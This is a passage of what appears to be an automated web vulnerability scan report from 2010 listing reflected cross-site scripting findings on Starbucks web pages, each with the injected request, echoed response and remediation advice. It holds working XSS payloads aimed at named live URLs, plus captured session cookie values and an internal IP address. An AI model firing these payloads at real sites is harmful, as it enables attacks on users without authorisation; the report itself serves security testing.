GET /menu/nutrition/35-under-350?c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:40 GMT
Connection: close
Content-Length: 40761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?c6282"style="x:expression(alert(1))"6302ba5a92f=1"/>
...[SNIP]...

3.37. http://www.starbucks.com/search [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97134"style%3d"x%3aexpression(alert(1))"eb377b674b2 was submitted in the keywords parameter. This input was echoed as 97134"style="x:expression(alert(1))"eb377b674b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%2797134"style%3d"x%3aexpression(alert(1))"eb377b674b2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:24:22 GMT
Content-Length: 33897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2"/>
...[SNIP]...

3.38. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fd7"style="x:expression(alert(1))"61073b145fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27&61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:39 GMT
Content-Length: 33815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1"/>
...[SNIP]...

3.39. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c58"style%3d"x%3aexpression(alert(1))"ef582612840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68c58"style="x:expression(alert(1))"ef582612840 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /whats-new?68c58"style%3d"x%3aexpression(alert(1))"ef582612840=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:19 GMT
Connection: close
Content-Length: 44105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/whats-new?68c58"style="x:expression(alert(1))"ef582612840=1"/>
...[SNIP]...

3.40. http://www.starbucksstore.com/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94486</script><script>alert(1)</script>44201d6d60c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB94486</script><script>alert(1)</script>44201d6d60c;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:38 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTB94486</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>44201D6D60C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.41. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /GuestAssist/poweredbycooking.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7108a</script><script>alert(1)</script>5486b3db851 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GuestAssist/poweredbycooking.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB7108a</script><script>alert(1)</script>5486b3db851;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14241
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:42 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
weredbycooking.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/poweredbycooking.asp"
   var s_prop3="SBPTPAHP1SHTB7108A</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>5486B3DB851"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/poweredbycooking.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.42. http://www.starbucksstore.com/StarbucksCard/default.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /StarbucksCard/default.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902c6</script><script>alert(1)</script>c645460f9b8 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /StarbucksCard/default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB902c6</script><script>alert(1)</script>c645460f9b8;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19859
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:44 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
rbucks Card HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Card HomePage"
   var s_prop3="SBPTPAHP1SHTB902C6</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C645460F9B8"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbuckscard/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.43. http://www.starbucksstore.com/Tours/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /Tours/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eafb</script><script>alert(1)</script>892117031bf was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6eafb</script><script>alert(1)</script>892117031bf;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:58 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
e="Starbucks Tours Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Tours Page"
   var s_prop3="SBPTPAHP1SHTB6EAFB</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>892117031BF"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-tours/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaig
...[SNIP]...

3.44. http://www.starbucksstore.com/aff/adredir.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ee24</script><script>alert(1)</script>86a7be884f9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6ee24</script><script>alert(1)</script>86a7be884f9;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29740
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:50 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>
       <title>Coffee at Starbucks Store</title>
       <meta name="description" content="Shop for Coffee at Starbucks Store">
       <meta name="keywords" content="Coffee, Sta
...[SNIP]...
s_pageName="Coffee HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Coffee HomePage"
   var s_prop3="SBPTPAHP1SHTB6EE24</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>86A7BE884F9"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee/default.asp?CCAID=SBPTPAHP1SHCO&Redir=/coffee/"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables
...[SNIP]...

3.45. http://www.starbucksstore.com/coffee [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea760</script><script>alert(1)</script>6b70b264755 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBea760</script><script>alert(1)</script>6b70b264755;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29705
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:52 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>
       <title>Coffee at Starbucks Store</title>
       <meta name="description" content="Shop for Coffee at Starbucks Store">
       <meta name="keywords" content="Coffee, Sta
...[SNIP]...
s_pageName="Coffee HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Coffee HomePage"
   var s_prop3="SBPTPAHP1SHTBEA760</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6B70B264755"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_sta
...[SNIP]...

3.46. http://www.starbucksstore.com/coffee-machines [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c32</script><script>alert(1)</script>953da364365 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee-machines HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB76c32</script><script>alert(1)</script>953da364365;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21134
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:59 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
eName="Equipment Homepage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Equipment Homepage"
   var s_prop3="SBPTPAHP1SHTB76C32</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>953DA364365"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee-machines/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.47. http://www.starbucksstore.com/coffee-machines/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da449</script><script>alert(1)</script>9e10653ba75 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee-machines/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBda449</script><script>alert(1)</script>9e10653ba75;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21134
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:23 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
eName="Equipment Homepage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Equipment Homepage"
   var s_prop3="SBPTPAHP1SHTBDA449</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9E10653BA75"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee-machines/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.48. http://www.starbucksstore.com/default.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8163c</script><script>alert(1)</script>ec3893ac889 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
